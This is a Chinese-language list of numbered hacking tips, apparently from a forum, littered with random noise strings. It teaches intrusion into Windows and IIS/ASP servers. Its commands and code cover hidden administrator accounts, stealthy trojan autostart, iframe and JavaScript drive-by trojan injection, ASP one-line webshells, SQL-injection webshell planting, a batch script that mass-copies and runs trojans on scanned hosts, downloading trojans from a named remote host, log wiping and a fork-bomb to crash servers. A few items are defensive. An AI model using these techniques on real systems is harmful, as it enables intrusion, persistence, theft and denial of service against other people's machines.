Xp系统修改权限防止病毒或木马等破坏系统,cmd下,! h9 }) P* e' Q6 I( z
cacls C:\windows\system32 /G hqw20:R% ]# I4 Q# |$ K5 q+ C
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入, |0 i P0 A; y$ R: j
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
4 n" y0 v0 f- j& ^6 s
! \0 U/ A4 @" Z) s# E6 Z2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。# z: v. u9 A4 T' k5 p% I
6 |( H$ H* ?1 T7 @9 v
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, a# y8 m2 z7 \2 U0 O }, E
7 V) o2 F' }; _" |& r% b6 @4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
; [% J1 Q7 b# n& _; ~2 s' U) h2 B! C3 Q: H4 S: N& D, F
5、利用INF文件来修改注册表4 n1 }) z, }6 F$ Q
[Version]2 _( q7 @/ H! v1 p
Signature="$CHICAGO$"
1 Z5 Y2 j0 W" i' { Q( v[Defaultinstall]3 L, n0 r* g [: p! |2 ~ X o
addREG=Ating
8 s' n; y/ R4 L[Ating]
* W8 x( v+ @1 D: u) AHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
' r! ]* k9 ~8 g" v) g9 V6 e/ ?; u以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
+ A. O+ t5 o2 q9 ]) X6 ?& P/ Grundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径8 t2 y6 c1 m; K
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
' u# \7 N. y7 x" u" OHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU( F! |/ {+ \0 C) S
HKEY_CURRENT_CONFIG 简写为 HKCC
; ~# y; i% E% k: K* {. M0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值6 p( P- Q0 h6 i( F
"1"这里代表是写入或删除注册表键值中的具体数据
* N0 O; |& h H3 Q, N0 n9 a) O: y; X7 ^, T
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,9 V1 n( d. i& \1 f
多了一步就是在防火墙里添加个端口,然后导出其键值
2 e, e5 c) d3 o# P$ W- Y[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
* F: g1 a6 Z3 r9 v
; v4 S. e7 n6 B" j: P7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽" L% f1 I. d2 O2 {/ l! \$ s. |- \7 g! |
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。* h, o) g: d9 d0 h5 P
# v1 ~( ?' Q2 _
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
: s( x5 Z) Q2 d6 S j8 {% _( I7 S+ i7 e) M9 V
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,2 K8 Q; g. C' t. a* M/ B
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
9 B. G) r8 e4 p5 X
; I6 C1 N* G7 W. K- r10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
! m# [% H/ @ V u7 A: N, k( O
" f+ l! x ~, Y4 s11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
9 J8 ]8 m Q/ h1 h5 {: A用法:xsniff –pass –hide –log pass.txt4 z( }! d6 W+ r- l8 g( W. `6 \
8 {# R0 j/ T f! r5 E; ^' J6 v; q
12、google搜索的艺术
6 b# m+ V7 ~9 f, O) R5 r/ g搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”# o$ |6 [; O' l4 L7 t
或“字符串的语法错误”可以找到很多sql注入漏洞。
$ `+ [" u/ z7 v1 X: T2 p) M/ `2 S& S& o8 ^
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
$ b; @8 c5 W. V' G1 C2 {- h7 q; G) X, D+ z: ]3 `0 O9 R
14、cmd中输入 nc –vv –l –p 1987) x6 i5 \4 p A6 r
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
( |6 a h A1 A9 o
7 k* M2 F5 G" h6 I" }; R" `15、制作T++木马,先写个ating.hta文件,内容为
" |0 V( o1 c4 K- { u9 n% I5 \<script language="VBScript">
! V! b) Z6 y! Y) C4 |set wshshell=createobject ("wscript.shell" )
/ w5 P! U- B+ D4 t) \: u+ h( U1 pa=wshshell.run("你马的名称",1)* y; X1 A# A! A% Y1 g' B- C
window.close1 B0 K7 p1 D0 ~' k5 B# B
</script>
, l& T" B" _0 k1 k8 k" T# j8 Y再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。* S/ |5 M; q' E/ S- D
; r* e+ a" O; Z+ j1 ?3 L- v
16、搜索栏里输入
* f1 e9 _9 `1 r7 Y# v, s0 l关键字%'and 1=1 and '%'='
, `$ |9 [) y5 e3 Q4 j) v关键字%'and 1=2 and '%'='- Q. I, D& ~* O2 Y2 g) L
比较不同处 可以作为注入的特征字符! \; x, r- `1 X: U9 l/ I2 ~$ Y t3 U
- S( U2 U( E5 |8 Y
17、挂马代码<html>3 R1 b; `1 `+ v
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; F5 O0 t9 @: d! j& Y</html>) f5 z6 K6 R) U7 _& }( B; N' j# H
% L0 }, B. x; |5 }( h2 f& e2 B) _18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,+ L; u' |2 ~# t" c4 k* X$ N
net localgroup administrators还是可以看出Guest是管理员来。
2 N; X: `& r# {3 M# O
# {+ l$ S! \7 g# r' @( ]19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等% x3 c$ M* f+ Y' {% d. e, {' n
用法: 安装: instsrv.exe 服务名称 路径
. t5 U; l7 j8 ~* U* X卸载: instsrv.exe 服务名称 REMOVE. ^9 h, t% J$ K2 o7 B
% h+ V! B4 d) H; U! v' Q3 X9 }# _ S6 H& a0 D1 I
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
% T0 r8 s3 u4 P _不能注入时要第一时间想到%5c暴库。9 l( I7 T6 Z3 f
, F- J1 o9 L2 V# l" W9 |2 u
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
( a( {3 T. B: j; w! M0 \6 t# c2 z% ]" n# ^& y" J
23、缺少xp_cmdshell时& s6 Q; _ B$ A$ H) T3 Y* Q
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'! n1 y/ X4 j/ B% R
假如恢复不成功,可以尝试直接加用户(针对开3389的)
1 q7 W8 m5 Q+ S7 Vdeclare @o int
1 }0 Y0 q7 ~+ A: u" Iexec sp_oacreate 'wscript.shell',@o out
v1 ]2 @+ [# T4 L* A# |* Y% b, hexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员9 ?% F& |) L* S( k
/ P# \1 y. `# ]; h) L24.批量种植木马.bat
3 p7 u7 e& D! Z M2 @for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中, Y& P2 f0 B: Y, Z2 _
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& G# v4 f. d( Y+ g( W8 n扫描地址.txt里每个主机名一行 用\\开头
8 K/ \: w$ d/ l
8 n3 a9 U7 c: Q4 B25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
6 Z9 g" D7 @8 E! U! A: \
) K, |' m8 d% s9 l; h) o9 X26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
: v, [# O# U5 a0 J# g; d: z将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
# n* M- z2 U+ N.cer 等后缀的文件夹下都可以运行任何后缀的asp木马. D0 h# P( s; e6 S" h1 o
2 v" R2 X3 i) S
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP9 I" F+ J- g4 O! c, f5 P7 D$ t
然后用#clear logg和#clear line vty *删除日志7 `' G& |6 M0 G# t0 d* e
# ]+ R- ^0 q7 F5 U0 k
28、电脑坏了省去重新安装系统的方法
' E+ I `* V. N6 M; _6 N纯dos下执行,
' V' |% U1 o6 P2 @xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
7 m8 C4 q( H2 M2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
* D1 i5 y8 ?/ ?5 O6 k* l8 Z+ v4 C' M$ `) q; s/ h9 o `) s8 L8 Q
29、解决TCP/IP筛选 在注册表里有三处,分别是:
' F0 @( P; r& S/ {4 `) S) \HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip% V& a# }, b' ?% Y" z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
7 q0 O" w5 _! K8 D1 I! |) t3 vHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ _' p3 Z) Y$ U% l2 y4 f; z" d分别用: Q& V3 s {2 w+ _
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) I2 J# C, p9 N @5 O0 Y9 n
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% y. Z0 V- f3 ]
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, `0 R( M5 M) f- l
命令来导出注册表项$ I; ?0 a3 U, @6 `9 ]% d; E+ X
然后把三个文件里的EnableSecurityFilters"=dword:00000001,& ~( s) Y3 j* e6 W
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用" Y" R; J8 p2 W0 V
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。* l0 g( i( [+ c+ \8 i# n( ?
: T( }* m( K1 H; M, S$ p" m30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U0 W5 V) l. ?, O [ }) j j
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
4 a4 p, X% w8 M! z5 E" g1 T/ V7 P: p4 B
31、全手工打造开3389工具! j: B* {/ V$ A" m$ D: i" ~8 ^5 L
打开记事本,编辑内容如下:
( H, z9 V: f5 ~7 ^- \$ r& J/ yecho [Components] > c:\sql( s/ H5 S2 h2 L x3 i, T
echo TSEnable = on >> c:\sql
( _9 M2 ]5 |' @0 n; w! J. rsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
! g/ |" F2 @5 x5 ~# @1 D5 | [编辑好后存为BAT文件,上传至肉鸡,执行
. i6 B4 D1 G- j5 P" B8 v' e- W3 z3 @# T! o1 k) I9 A4 j
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马8 Y" r" E9 ^) w1 ^' U7 |
# X, I; ~4 u8 T2 n+ W33、让服务器重启
, r) t7 \. k; ~0 k! k+ j" d% E' j写个bat死循环:3 V8 c6 ^' _' H: l9 i. I
@echo off
- K; j% ?) T, b" L4 K6 m:loop1
" L1 ?& x# }6 y1 S: b7 |* c( r% lcls2 C2 M; e- t' J' p! j# X, [
start cmd.exe) O. z# m) V; K7 m' c- M
goto loop1
/ B2 L. {* o8 E1 p8 l' R保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启# ] H* z% y/ @: K6 g+ W0 |8 H
; H- x# q+ X. c, l. k34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- J7 X9 I" E/ b$ p@echo off' H& Z& [4 t0 x
date /t >c:/3389.txt
- W9 A) R" t. jtime /t >>c:/3389.txt, n& J+ V1 O* X( y7 u1 V F, e
attrib +s +h c:/3389.bat, ]* \$ o7 F9 r2 l5 g
attrib +s +h c:/3389.txt( [) y8 i3 J0 H# e* b' q7 |
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
! @$ ^: s! h! {并保存为3389.bat8 i6 L, ?" J# w; D& H
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号/ _& n0 K, [& T
% y. @6 c: i' z$ q q
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
* g' p9 ?% k% vstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)9 _9 F3 h: s7 q. G2 ^. Z( C& m7 W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。! m6 J c1 \4 K, T* j9 u
9 K3 D) s; y+ }36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件* W8 w7 \+ l# q# m
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
0 ?% H9 Q) a# T; Z% \" Gecho 你的FTP账号 >>c:\1.bat //输入账号
) F2 P9 `% H. [2 v3 Hecho 你的FTP密码 >>c:\1.bat //输入密码2 ?; q4 b4 P9 Y6 G- B
echo bin >>c:\1.bat //登入
1 H1 ^ I" `; x" p% }echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
* L; ?+ N) d: k3 v2 |& ~echo bye >>c:\1.bat //退出
0 ]" q4 [1 D9 X) [0 Q. y0 I然后执行ftp -s:c:\1.bat即可
6 L0 v8 {; u, M' R* |+ a
1 y: e/ p+ L8 S. ~37、修改注册表开3389两法2 P. S. M, k6 n4 W: R
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表! ~$ ]3 u$ n3 N9 Y$ i
echo Windows Registry Editor Version 5.00 >>3389.reg
' M9 y n1 b, G# eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
; F$ v4 ~: B" U. q. a! |echo "Enabled"="0" >>3389.reg. K0 d" G9 K0 h9 L/ u
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows+ f* i4 f% D3 c' B/ K' }: m: c. X# E
NT\CurrentVersion\Winlogon] >>3389.reg
! I- z$ ]3 E$ N% `% Z9 Eecho "ShutdownWithoutLogon"="0" >>3389.reg
. P: G2 q5 [. Y# p Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
: P: w3 c, \' H' ^$ F* i>>3389.reg: ^8 \ @ s+ d2 o" A( S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
& X5 w$ W, k& G+ w0 Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
7 |1 `1 _# k- \: W4 g+ R7 ~>>3389.reg
$ v7 u1 J) \ |0 Z* O! \echo "TSEnabled"=dword:00000001 >>3389.reg T) X3 {& F _( t9 T% z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg; _" B, H/ _) }0 I+ z0 f
echo "Start"=dword:00000002 >>3389.reg q( |; ~9 u" q) S8 j4 l# `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
& R8 F2 W% n5 O+ h, j- n>>3389.reg
M, x# Y$ F: P& mecho "Start"=dword:00000002 >>3389.reg
) B+ o6 P ]0 M# ^echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg' s( b% {& z0 Y
echo "Hotkey"="1" >>3389.reg
& j1 j5 L' A* ?) uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ |4 I( V7 k# \: A7 j
Server\Wds\rdpwd\Tds\tcp] >>3389.reg* k/ L1 P. M; R! R. Z8 }
echo "PortNumber"=dword:00000D3D >>3389.reg& ?8 m1 U# y9 n+ n' I7 x0 W' r' D0 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal ~* m: S( V* ?$ \' u3 b# E
Server\WinStations\RDP-Tcp] >>3389.reg
8 @0 U6 ?- K% W& e4 @, V$ Decho "PortNumber"=dword:00000D3D >>3389.reg6 h) P* }. D8 A$ w) S# r# q
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。 u/ x) x6 o) y* o" M$ L
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
0 e5 G, R+ r0 H- v# t0 g' W/ @因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效, s* ~# R; h+ v$ \& Z, n8 f
(2)winxp和win2003终端开启2 r1 M. y1 g, a5 K9 z
用以下ECHO代码写一个REG文件:
1 d3 j7 K% \2 G0 h: Oecho Windows Registry Editor Version 5.00>>3389.reg- ^1 @6 J4 O8 s: m0 {; B- h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 t- X) p- o4 F( ?% {. C( wServer]>>3389.reg* o3 e% Y; u% O( |# ?
echo "fDenyTSConnections"=dword:00000000>>3389.reg
- q% ^; _; ]) e4 y9 Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 K5 J0 ^* r; ?# j
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
) \! l3 g1 ^. `9 }" decho "PortNumber"=dword:00000d3d>>3389.reg! c$ J7 k- U% [& R' m1 v4 A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 L8 k+ r- h4 E+ p% ]+ O% }Server\WinStations\RDP-Tcp]>>3389.reg
: S! Z" h& `3 l n: C4 N" d0 X/ fecho "PortNumber"=dword:00000d3d>>3389.reg
, x" g+ D3 r6 }: {5 h+ w# w9 d然后regedit /s 3389.reg del 3389.reg: Q1 y) K# ~/ M- c6 Z+ [# [0 r3 Z
XP下不论开终端还是改终端端口都不需重启
( D7 \; z! s f; n* G# T5 e% I' A' P8 g2 g1 @
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
" x5 Z8 W6 i, r用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'% h$ N0 J2 b, J
3 Y0 V5 M, y( J' {39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!) n& f% U0 d( R+ ?
(1)数据库文件名应复杂并要有特殊字符2 T5 S. J5 i+ U; r
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源2 {& ^ V9 ?4 I W* t( Q% J. s
将conn.asp文档中的
L& z8 Z6 G/ h8 i t8 uDBPath = Server.MapPath("数据库.mdb")
: g( V0 f+ C. X: _, |. vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
( u7 x* W4 [% ]( P
, q7 E. }. @2 p( o修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
' d1 w$ x+ S: r(3)不放在WEB目录里' }4 L t6 f3 T
/ p5 y9 ~% a' R+ e5 g4 W40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉9 K2 q) m* ]8 o# v4 ^
可以写两个bat文件) J! y0 p, {/ n# O# |( Y; \5 f
@echo off$ g; C+ \6 o% s9 o+ g" Z
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe1 B) B% p% ~! W# k
@del c:\winnt\system32\query.exe1 w* K! k( j0 t2 X/ S/ U8 o* G
@del %SYSTEMROOT%\system32\dllcache\query.exe7 N8 t7 P* x- c5 {2 a
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
/ u% Y5 ~5 m( ]. ~7 `' W) C# }( C& A4 h q
@echo off
% M6 U/ e! @0 D1 v: x4 S4 d@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
3 v2 f9 D/ \( z. l5 d# F@del c:\winnt\system32\tsadmin.exe
; o2 z, m+ c- \+ L@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex" d! V9 A% S T; d1 ?6 T: f
X G% ^% N. I" \# e
41、映射对方盘符
" i# }8 D T/ O) }- Xtelnet到他的机器上,
8 B8 y3 ~4 v- X6 V0 \5 y: _6 Unet share 查看有没有默认共享 如果没有,那么就接着运行
# T' q4 P' C# `. J& {net share c$=c:
0 k1 B/ [) d6 J$ Y, S4 i6 H; m& Unet share现在有c$/ p% w+ T& l$ N& E: r
在自己的机器上运行
& z8 h/ y! }( G1 F2 v, onet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K& Q% Y, p# u( r/ g( E) a7 I1 N) g) j
% n4 Q; s% M" f1 Q- u" F/ H
42、一些很有用的老知识, t6 m4 W! A$ b( n
type c:\boot.ini ( 查看系统版本 ) l, K4 _* u- z0 n$ ^7 U+ J
net start (查看已经启动的服务). W% k* b# ~ Y9 C u
query user ( 查看当前终端连接 ): ?0 P1 S9 u& g5 u6 s
net user ( 查看当前用户 )
# R8 e& ]' I6 Y7 lnet user 用户 密码/add ( 建立账号 )
1 @( |8 I2 j: O, [6 Onet localgroup administrators 用户 /add (提升某用户为管理员)
+ q) y* {8 O+ H" |) Bipconfig -all ( 查看IP什么的 )
# z f0 Y* a S% U( G, cnetstat -an ( 查看当前网络状态 )% W& ]/ s* {9 X" Y' O# h& B
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)! C+ ?7 M+ o6 X7 D( @* u- W
克隆时Administrator对应1F4
) V3 v' [- `* v" r7 L$ fguest对应1F5* Z' p- x& z- ^& V9 r
tsinternetuser对应3E8" M( |! Z+ [' V% X
v5 P: ~/ f+ d7 O# z9 ~43、如果对方没开3389,但是装了Remote Administrator Service/ j" h F7 L; l7 J" R
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
! ]7 S; m1 _) g8 ], b$ b解释:用serv-u漏洞导入自己配制好的radmin的注册表信息5 d# O" g @- U0 Y- B7 U
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"( F _' e5 b& m+ p6 I* y9 V; E9 D
/ ?7 v- j+ j1 B2 r, `/ Q, B3 L44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
+ R. P- G4 b8 q2 u本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
2 q" }! f/ g1 x1 r
8 h. B: j1 Z' D: H4 ~* ^45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)" z* v' Y9 b) X5 u7 B% x$ T. n" f
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open* @4 v2 S7 u3 D
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
/ _) @0 o# i, j. j6 c! F. TCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ l9 H( D( J- h; V1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
, e! M+ R9 [9 M$ P6 u. W: n(这是完整的一句话,其中没有换行符)
, }" Q1 u: z, K8 J/ z然后下载:
6 s- `- d+ X6 ?+ _cscript down.vbs http://www.hack520.org/hack.exe hack.exe
4 O; [3 P* v: j/ L D3 Y& T
: S" }4 B; h' o" ?% g3 H2 n46、一句话木马成功依赖于两个条件:* P: F; A* j- W/ x) l9 Z
1、服务端没有禁止adodb.Stream或FSO组件
% O3 I1 i, h. v7 F8 i2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。5 e. R* Q+ z. q, w
: b" s2 X. i( ?47、利用DB_OWNER权限进行手工备份一句话木马的代码:; n) M4 u# U: ?7 X, L
;alter database utsz set RECOVERY FULL--
) ?8 T: F; V* i$ M+ i& \" T;create table cmd (a image)--
) t! v. S6 G6 n;backup log utsz to disk = 'D:\cmd' with init--
( r; P6 K- ~$ D# ?. r9 e, X;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--. J+ M, l: I' n ~: O
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
: s, L" T1 M- Q注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。! i: l7 U" s; d6 ?3 A# E
0 d& {7 g7 b6 r4 ~6 L0 W( G
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:; Z) y" a8 B+ I
8 D, S; U/ F. v) t' I0 I用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
( X% |- C' [' b( u所有会话用 'all'。
0 U" _/ ]2 s! [4 W$ p-s sessionid 列出会话的信息。1 r3 m% Z: e8 d; n) E
-k sessionid 终止会话。4 u- o* a C5 z3 `: ~, x( V$ _% |
-m sessionid 发送消息到会话。
) o k) W0 B8 P' o# ?0 y- x, s5 f) ]+ |+ P* H
config 配置 telnet 服务器参数。
# o% s" ~% A! ]; K. z6 ^( v( f6 G6 U
common_options 为:
9 T# m4 j* z: k: w. E! E9 V# v-u user 指定要使用其凭据的用户/ C* y; y5 h; r! X8 {0 f
-p password 用户密码
) U! _5 H l5 V- m) _: M" }9 R" t- g$ p, V2 w5 s7 ]
config_options 为:6 C2 V9 o5 F. ]" G+ m
dom = domain 设定用户的默认域
6 a9 r9 k5 A, b& t2 |) I8 q/ N: Nctrlakeymap = yes|no 设定 ALT 键的映射: F* \, [ W& l3 D
timeout = hh:mm:ss 设定空闲会话超时值) E+ f( K1 m( G
timeoutactive = yes|no 启用空闲会话。& l0 a2 }% _/ w6 @" [6 r, C
maxfail = attempts 设定断开前失败的登录企图数。
! `9 Q" d% v5 dmaxconn = connections 设定最大连接数。( c& Y% d( ^: b# e, `* L( i8 J& Q
port = number 设定 telnet 端口。 {- c2 d- w4 n. d# {
sec = [+/-]NTLM [+/-]passwd$ @7 @2 V4 l$ |# }$ E3 F9 y3 T
设定身份验证机构: m3 B" t+ |- Y& |; u6 Z
fname = file 指定审计文件名。
$ f* q: y$ b8 Z; ` e5 R! J- Rfsize = size 指定审计文件的最大尺寸(MB)。. p+ u. S% J5 G2 z9 O( d
mode = console|stream 指定操作模式。8 S' L8 b6 y9 i
auditlocation = eventlog|file|both6 n) r) [9 B6 J; R! ^
指定记录地点- M7 S9 P* e0 |, v
audit = [+/-]user [+/-]fail [+/-]admin
* C. ~4 z' m1 R( |/ \6 [' R+ K( [) M3 |. J# p0 x! i+ J$ c' h( Z6 K/ T
49、例如:在IE上访问:4 t4 {* l2 @( p, l1 ^ \9 Q: j
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/' f5 ]* g+ e1 D4 C
hack.txt里面的代码是:
" ?) O9 ]$ V; e. ]- l1 K<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
0 y& F( P) z& ], _. I把这个hack.txt发到你空间就可以了!2 z* _3 E7 M$ q1 F& g
这个可以利用来做网马哦!5 y3 g0 B c" |- a4 P: n$ @
' H( y4 {' g( Z
50、autorun的病毒可以通过手动限制!9 M Q& m. V2 B! A+ @* \( f2 W! ]
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
" x! b: N0 d$ Y; n) B+ f2,打开盘符用右键打开!切忌双击盘符~0 `& X, K$ ~5 V: @5 v
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!( S2 k& ~# y8 D1 ~" d5 ?
1 q- E; q: p( V2 A
51、log备份时的一句话木马:
- h- J4 z" X( k- L7 [+ J1 pa).<%%25Execute(request("go"))%%25>
- B/ }4 m* e* y, U8 A) Tb).<%Execute(request("go"))%>
3 H# V/ q, \7 x' G, D2 kc).%><%execute request("go")%><%( X/ i4 `" F8 i+ o
d).<script language=VBScript runat=server>execute request("sb")</Script>1 z$ }( i: W5 S7 [3 J% }
e).<%25Execute(request("l"))%25>
+ d) O; L7 ^4 Lf).<%if request("cmd")<>"" then execute request("pass")%>. Z( @. ^) L) D- h/ B
5 O! t6 T4 G/ ]% R
52、at "12:17" /interactive cmd
0 [0 \6 L- D$ H j9 ^; {9 ~ F8 q! g执行后可以用AT命令查看新加的任务) P: G6 a& \+ k4 u# e
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。# I! G% U( p; q4 r7 t
